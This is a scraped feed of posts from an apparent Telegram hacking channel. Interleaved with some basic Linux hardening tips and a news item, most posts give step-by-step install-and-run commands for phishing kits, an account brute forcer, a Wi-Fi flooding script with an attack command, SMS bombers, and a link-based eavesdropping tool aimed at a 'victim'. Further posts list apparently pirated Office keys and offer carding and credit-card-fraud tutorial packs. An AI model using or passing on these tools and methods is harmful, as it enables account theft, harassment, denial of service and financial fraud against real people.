UNDERCODE SECURITY
225 subscribers
295 photos
1.03K files
1.73K links
πŸ¦‘WELCOME IN UNDERCODE TESTING FOR LEARN HACKING | PROGRAMMING | SECURITY & more..

THIS CHANNEL BY :

@UndercodeTesting
UndercodeTesting.com (official)

@iUndercode
iUndercode.com (iOs)

@Dailycve
DailyCve.com


@UndercodeNews
UndercodeNews.com
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘LINUX TIPS

1️⃣Never use weak passwords
For some reason, everyone thinks that the attacker does not want to pick up your password. Perhaps he really will not do it. But in case of server compromise, the cracker will receive a file with password hashes of all users. When trying to recover hash values, weak passwords are the first to succumb. And given that many users often use the same password wherever possible, the consequences can be sad.

Password must be at least 11 characters long, contain letters in both registers, numbers and special characters. You can’t think of such a password - use the password generator.

Learn to remember passwords, and not write them on a piece of paper and sculpt to the monitor.

2️⃣Set a password on the BIOS
A BIOS password, in some cases, can make it difficult for an attacker to access your data.

3️⃣ Be sure to disable unused services
Do not use ssh? Disconnect! Is the web server running? Do you really need it? If you do not know how to display a list of working services and disable some of them, use auxiliary software.

4️⃣Update quickly and completely.
Install all patches that are related to security. Try to update as quickly as possible. Holes are often found in programs and while the user thinks about the need to update (and some even postpone updates for several days), vulnerabilities in programs are exploited, rootkits are installed, which are then quite difficult to clean up.

By the way, there is a funny Linux Mint distribution in which security updates are divided into categories: β€œit can be installed”, β€œyou can wait with it” and β€œbut you can not install it at all”. If you need security, then avoid using such distributions.

5️⃣There are also enemies in LAN
Do not trust local network users. Many provide the resources of their computer to users from the local network. This approach to security policy is partially justified, because it’s easier for a local attacker to calculate and put a stool on his head, which stops many potential hackers. But an attacker from an external network can gain access to one of the computers on the local network and launch attacks from him.

6️⃣ Protect your privacy
Learn the built-in security features of your distribution. Many distributions provide the ability to remove traces of user activity, as browsers allow you to delete the cache and browsing history. For example, in Ubuntu, you can go to "System Preferences" and select "Privacy" to indicate what types of user activity should not be monitored.

7️⃣Use encryption. Whenever possible
Many programs have an option to encrypt data. Carefully study all the features provided and see how they could help you strengthen the overall security of the system. Encryption complicates an inconspicuous data substitution and protects police officers from unnecessary questions when they come to seize your computer.

Enjoy β€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘for beginers Hacking VK, insty etc. using phishing
-similar sended tools : hiddeneye - shellphisher-
#fAstTips

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :
 update

2️⃣apt upgrade

3️⃣apt install git -y

4️⃣pkg up

5️⃣pkg install curl

6️⃣pkg install php

7️⃣pkg install wget

8️⃣git clone git: //github.com/htr-tech/nexphisher.git

9️⃣cd nexphisher

πŸ”Ÿbash tmux_setup


use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘2020 from 10 days Bruteforce accounts sayat.me

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1️⃣install for Linux

1) apt-get update && apt-get install git && apt-get install python3 && apt-get install python3-pip --fix-missing
2) git clone https://github.com/termux-lab/SayatBrute
3) cd SayatBrute
4) pip3 install colorama && pip3 install requests
5) python3 main.py

2️⃣install for Windows

1) Download Python3
2) Download Git
3) git clone https://github.com/termux-lab/SayatBrute
4) pip install colorama
5) pip install requests
6) cd SayatBrute
7) python main.py

3️⃣install for Termux

1) pkg install python && pkg install git
2) pip3 install colorama && pip3 install requests
3) cd SayatBrute
4) git clone https://github.com/termux-lab/SayatBrute
5) python3 main.py

ENJOY β€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘arrange a DDoS attack on Wi-Fi from the phone

> DDoS is a hacker attack on a computer system in order to bring it to failure, that is, the creation of conditions under which users of the system will not be able to access the provided system resources (servers), or this access will be difficult.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1️⃣pkg upgrade

2️⃣pkg install python python2 git

3️⃣cd

4️⃣git clone https://github.com/artem-cell/wifi-dosser

5️⃣cd wifi-dosser

6️⃣pip2 install requests mechanize

7️⃣ls

8️⃣python2 wifi-ddoser.py

9️⃣To carry out an attack, you need to connect to a router. Next, enter the command below.

> python2 wifi-ddoser.py example.com 80 3 999999999999

πŸ”Ÿ80 and 3 are standard ports

1️⃣1️⃣999999999999 is the attack time in seconds

1️⃣2️⃣To stop the attack, you need to restart the router

use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Install Wireshark in Termux full by undercode:

1) First install x11-repo and nano

2) pkg update

3) pkg upgrade -y

4) pkg install x11-repo

5) pkg install nano

6) Now install xterm

7) pkg install xterm

8) tigervnc and Wireshark

9) pkg install tigervnc

10) pkg install wireshark-gtk

11) Now we need to change one file

12) cd $ HOME

13) nano ../usr/etc/bash.bashrc

14) We go to the very end of the file and write

15) export DISPLAY = ": 1

16) Save - ctrl + x, y, enter

> Now we write

17) source ../usr/etc/bash.bashrc

18) vncserver

19) At the first start, you will be asked to enter a password.

127.0.0.1::5901

20) If when creating vnc in termux you had written localhost: 2, then instead of 1 we write 2, with the remaining numbers the same way.

21) In the name field, at least.

22) It remains only to connect, you will be asked to enter the password that you entered when you first created the vnc server.

use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Universal Installer Termux Fsociety
what this great tool can do ?

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) pkg update

2) pkg upgrade -y

3) git clone https://github.com/Manisso/fsociety

4) cd fsociety

5) . /install.sh

6) python2 fsociety.py

πŸ¦‘Menu
1. collection of information
2.Password Attacks
3.Wireless Testing
4. Operation Tools
5.Sniffing & Spoofing
6.Web Hack
7. Private Web Hacking
8.After Operation
0.install updates
99.output

enjoyβ€οΈπŸ‘πŸ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Termux INSTALL NMAP :

1️⃣pkg update

2️⃣pkg upgrade - y

3️⃣pkg install nmap

4️⃣Launch command

> nmap options ip_address

5️⃣And now I will show you the main functions of nmap :

-sL create a list of running hosts.
-sP check if ip address is available.
-PN consider all hosts to be working even if they are not working.
-sS / sT / sA / sM / sW scan tcp ports.
-sU scan udp ports.
-sN / sF / sX - TCP NULL and FIN scan.
-sC run the default script.
-sI Indle scan.
-p specify the range of ports to check.
-sV port exploration for verifying service versions.
-O define the operating system.
-T 0-5 scan speed, the more the faster.
-D mask the scan using dummy IP.
-S change your IP address to the specified one.
-e use a specific interface.
--spoof-mac set your MAC address.
-A definition of the operating system using spec. scripts.



enjoyβ€οΈπŸ‘πŸ»
#FastTips
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘2020 sms spam Bomber :
After entering the command, wait until $ lights up , if it does not light up, and a question pops up - I wrote about this below, when it caught fire we enter the following commands.

All commands are entered with a capital letter, I advise you to copy

If you entered at least one character incorrectly, then nothing will work.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1) pkg update

2) pkg upgrade

3) pkg install git

4) pkg install python

5) pkg install python clang make -y

6) pip install --upgrade pip (it’s important that there is a 2 dash)

7) git clone https://github.com/crinny/b0mb3r

8) pip3 install b0mb3r -U

use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘SayHello Or how to eavesdrop-For Beginers.

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

 update && apt upgrade

2️⃣pkg install openssh git php wget

3️⃣When asked about the continuation we answer y

4️⃣git clone https://github.com/thelinuxchoice/sayhello.git
Launch

5️⃣cd sayhello

6️⃣chmod + x sayhello.sh

7️⃣./ sayhello.sh

8️⃣Choose ngrok

9️⃣We throw the link to the victim.

use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 Free SMS bomber on Android 100ms in 20 secondsπŸ”₯

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :
 update

2️⃣apt upgrade

3️⃣pkg install python

4️⃣pip install --upgrade pip

5️⃣apt install git

6️⃣git clone https://github.com/FSystem88/spymer

7️⃣sh spymer / install.sh

8️⃣After you better go to Termux.

9️⃣Launch: spymer 7988 ********* (we indicate the number through 7 without +)

use for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
Forwarded from Backup Legal Mega
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ The Complete Deep Web Course Become An Expert! - VIDEO + PDFs
#Requested

πŸ¦‘π•ƒπ”Όπ•‹' π•Š π•Šπ•‹π”Έβ„π•‹ :

1) Welcome To The Complete Deep Web Course!

> https://mega.nz/folder/vV01UKRL#JPxZAdTiBP038ffe84ED9w

2) Introduction To The Deep Web

> https://mega.nz/folder/iIkhlShJ#15IQ0MI9HH1EN80Nje-8AA

3) Setting Up The Environment

> https://mega.nz/folder/rJ033YQI#33K59Uwzr6R6bRNjVW-R5Q

4) Hands On With The Deep Web

> https://mega.nz/folder/7Zs3BIYJ#agwGLkEwDOxdi96-FIoDPQ

5) Deep Web Link Directories ( A Huge onion link collection) πŸ¦‘

> https://mega.nz/folder/vE9HkaSD#kJEdwTMxUC92yxgm3pFEhg

6) Bitcoin & Cryptocurrency On The Deep Web

> https://mega.nz/folder/DFl1wQzK#GhqGh_dKA8Q2f13cl6soYw

7) PGP Tutorial - Deep Web

> https://mega.nz/folder/rJsD0SyZ#I9ZURcrEHKTD39OWJzz4-w

8) How To Create And Host A Deep Web WebsiteOnion Site

> https://mega.nz/folder/mRlhhQQS#he7hMdI-m-Kb4gLg88vYDQ

9) How To Access The Deep Web On Android

> https://mega.nz/folder/DA8nXKyB#dguY0xzzE8Cv4wiYs9evhg

@undercodeTesting
@Undercodehacking
@UndercodeSecurity
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

Microsoft Office 2020 Keys(Wiki-2020 keys)



πŸ¦‘Office 365 Keys for FREE
N7PXY-WR4XP-D4FGK-K66JH-CYQ6X

N4M7D-PD46X-TJ2HQ-RPDD7-T28P9

B9GN2-DXXQC-9DHKT-GGWCR-4X6XK

2B8KN-FFK6J-YWMV4-J3DY2-3YF29

FCMXC-RDWMP-RFGVD-8TGPD-
VQQ2X

4HNBK-863MH-6CR6P-GQ6WP-J42C9

2MNJP-QY9KX-MKBKM-9VFJ2-CJ9KK

XRNFT-HG2FV-G74BP-7PVDC-JB29K

DJD94-DFKD9-FJD94JD894-FJKD94JD

DJC4N-DX7PC-GM3GK-V8KKW-XWYGX

DJKSE-DFJS93-DFJKD94JD-DJKD94JD

6KTFN-PQH9H T8MMB-YG8K4-367TX

6PMNJ-Q33T3-VJQFJ-23D3H-6XVTX

PGD67-JN23K-JGVWW-KTHP4-GXR9G

PBTFM-WWN3H-2GD9X-VJRMG-C9VT

MT7YN-TMV9C-7DDX9-64W77-B7R4D

πŸ¦‘Microsoft Office 365 Pro Plus Product Key

4HNBK-863MH-6CR6P-GQ6WP-J42C9

366NX-BQ62X-PQT9G-GPX4H-VT7TX

6KTFN-PQH9H T8MMB-YG8K4-367TX

KDVQM-HMNFJ-P9PJX-96HDF-DJYGX

KBDNM-R8CD9-RK366-WFM3X-C7GXK

H746C-BM4VK-TZBB8-MVZH8-FXR32

MH2KN-96KYR-GTRD4-KBKP4-Q9JP9

2MHJR-V4MR2-V4Z2Y-72MQ7-KC6XK

2MNJP-QY9KX-MKBKM-9VFJ2-CJ9KK

P8TFP-JGFMM-XPV3X-3FQM2-8K4RP

N4M7D-PD46X-TJ2HQ-RPDD7-T28P9
FBFPP-2XG5Y-FG9VH-DVQ2Z-QJRCH

NK8R7-8VXCQ 3M2FM-8446R-WFD6X

πŸ¦‘Microsoft Office 365 Activation Key

MTDNG-PDDGD-MHMV4-F2MBY-RCXKK

DJC4N-DX7PC-GM3GK-V8KKW-XWYGX

46DNX-B4Q98-PQVPW-Q8VM6-FVR29

N4M7D-PD46X-TJ2HQ-RPDD7-T28P9

GYWDG-NMV9P-746HR-Y2VQW-YPXKK

PBTFM-WWN3H-2GD9X-VJRMG-C9VTX

2MNJP-QY9KX-MKBKM-9VFJ2-CJ9KK
NK8R7-8VXCQ 3M2FM-8446R-WFD6X

N7PXY-WR4XP-D4FGK-K66JH-CYQ6X

GPT9W-CWNJK-KB29G-8V93J-TQ429

366NX-BQ62X-PQT9G-GPX4H-VT7TX
4HNBK-863MH-6CR6P-GQ6WP-J42C9

MH2KN-96KYR-GTRD4-KBKP4-Q9JP9

X2YWD-NWJ42-3PGD6-M37DP-VFP9K

N2P94-XV8HD-W9MHF-VQHHH-M4D6X

πŸ¦‘Office 365 Product Key
2B8KN-FFK6J-YWMV4-J3DY2-3YF29

KBDNM-R8CD9-RK366-WFM3X-C7GXK

6HDB9-BNRGY-J3F83-CF43C-D67TX

WTFN9-KRCBV-2VBBH-BC272-27GXM

6KTFN-PQH9H T8MMB-YG8K4-367TX

KDVQM-HMNFJ-P9PJX-96HDF-
DJYGX

XRNFT-HG2FV-G74BP-7PVDC-JB29K

PNP4F-KY64B-JJF4P-7R7J9-7XJP9

DMXHM-GNMM3-MYHHK-6TVT2-XTKKK

G9N3P-GRJK6-VM63J-F9M27-KHGXK
7TPNM-PMWKF-WVHKV-G869H-9BQ6X

433NF-H7TMK-TPMPK-W4FGW-7FP9K

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
Forwarded from UNDERCODE HACKING
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Carding pdf/videos russian wiki

1️⃣Carding for noobs*
https://www.mediafire.com/file/o4gbaxar ... bs.pdf.pdf

2️⃣7 drop methods*

https://www.mediafire.com/file/5x88c633 ... ethods.pdf

3️⃣ATM hacked (for knowledge purpose)*
https://www.mediafire.com/file/d5hrtksi ... thdraw.pdf


4️⃣pro carding tutorials*
https://www.mediafire.com/file/6gqlt9d5 ... DER(0).pdf


########## videos ############


1️⃣Black hat carding : https://www.mediafire.com/file/k350b64i ... PECIAL.zip


2️⃣Best carding course
Password :- 26BHY


https://mega.nz/#!FGIlBBrS!I-3zqxENG1m3 ... G2xnt1wZJY

ruwiki
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

big carding pack get before revoqued
βž• Netflix Cracker
βž• Free 1 Month Netflix Trick ( You Can Create Unlimited Account ) :)
βž• Free Netflix using PayPal ( Video Tutorial )
βž• Free Amazon Prime Trick :) + Video Tutorial
βž• Hotstar Cracking Trick (Video Tutorial)
βž• How To Bypass Link Shortner
βž• Instagram Liker
βž• Snow's YouTube Bot
βž• YouTube View Booster Bot :)
βž• YouTube Blazzer
βž• 50 Android Hacks
βž• Amazon Gift Cards
βž• Paypal Method
βž• Ebay Method
βž• Free Amazon Gift Card Method
βž• Free Pizza Method
βž• Flipkart Carding Tutorial :)
βž• How To Get Fresh Valid Proxy List For Cracking
βž• How To Get A Free Master Card :)
βž• How To Get Referrals
βž• Bypass Gmail Mobile Verification Trick
βž• Bypass Android Pattern Lock Using ADB
βž• Get Refund Of GiftCard
βž• Facebook Hacking Ebook :)
βž• Get Things From Ebay For Free
βž• SEO Secrets
βž• Guide To Make Money Online
βž• Hack Hotmail
βž• Hack Gmail
βž• 4 Hacking Methods :)
βž• CC Generator
βž• CC Checker
βž• Crack WEP in Linux
βž• Get Massive YouTube Traffic :)
βž• Get Passes To Pornsites
βž• Hack WEP WiFi Password
βž• Kick Someone Of A Wireless Network
βž• Make $1000's A Week With Torrents
βž• Make A Phisher For A Website (Facebook/Instragram/Etc)
βž• Make Easy Money As An eBay Affiliate
βž• Make Multiple Gmail Accounts With Only 1 Account :)
βž• How To Make Mozilla 30 Times Faster
βž• USA Whatsapp Number Trick
βž• Collection Of Rare Hacking Ebooks :)
βž• Starbucks Method
βž• How To Call Someone From His Own Number (Caller Id Spoofing) :)
βž• Transfer PP Balance Method
βž• YouTube RED Trick
βž• Gana Mod App :)
βž• Netflix Mod App :) (Look a Like)
βž• Saavn Mod App :)
βž• Express VPN Mod App :)
βž• 7 Reasons a Credit Card Is Blocked
βž• Amazon Carding Method :) + Video Tutorial
βž• What is Carding?? (Video)
βž• Basic Carding TutoBal
βž• Phishing Tutorial
βž• Easy Cardable Sites List :)
βž• Find Local BIN's
βž• Carding For Noobs
βž• Carding Online Tools And Website
βž• PayPal Carding
βž• Wallmart Carding
βž• Amazon Carding (Video Tutorial) :)
βž• eBay Carding (Video Tutorial)
βž• How To Find Credit Card For Carding ( Video )
βž• Wifi Hacking Course :)
βž• Bypass Gmail Mobile Verification
βž• *Hack Instragram, Facebook & Much More With Your Android/PC* :)
βž• Zomato Refund Trick
βž• Latest eBay Card

Download Link:- https://drive.google.com/file/d/1PDkfJ3j3e_RzH9spBiYLAw_ejGWUru1l/view


Pass :- abcd123

enjoy
this one from deepwebstuff and some baned telegram channels-not uploaded by us
use
for learn
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁

πŸ¦‘Facebook re-exposed vulnerability: sharing user data with developers overtime

> Sina Technology News Beijing time on July 2 morning news, after the "Cambridge Analysis Scandal" was exposed, FacebookThere was a promise to impose a time limit when sharing user data with external developers, but the actual deadline exceeded their original promise.

> The company previously stated that if the user does not interact with the developer for more than 90 days, it will prevent the application from obtaining user data. At that time, developers need to re-acquire permission to get access to data such as e-mail, birthday and city,

> But Facebook said in a blog post on Wednesday that this rule has not been implemented smoothly in some cases. If the user also contacts Facebook friends through the application, the developer can obtain the data of the two users at the same time. However, a company spokesperson said that the vulnerability would cause developers to see the data of a user’s friends when they get the data of an active user, even if the latter has not opened the application for more than 90 days.

> Facebook revealed that this issue involves about 5,000 developers. But they did not disclose the number of users who might be affected by this.

> "We will solve the problem after we find it," Facebook wrote in the blog post. "We will continue to investigate and will continue to maintain transparency around any major updates."

> The vulnerability was discovered by a Facebook engineer two weeks ago, but the company said that they have no reason to believe that the relevant data has been misused.

written by undercode
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«6𝔬𝓓ⓔ β–„ β–‚ ▁
Forwarded from Free Premium Accounts Telegram Channel - Netflix - Spotify
Please open Telegram to view this post
VIEW IN TELEGRAM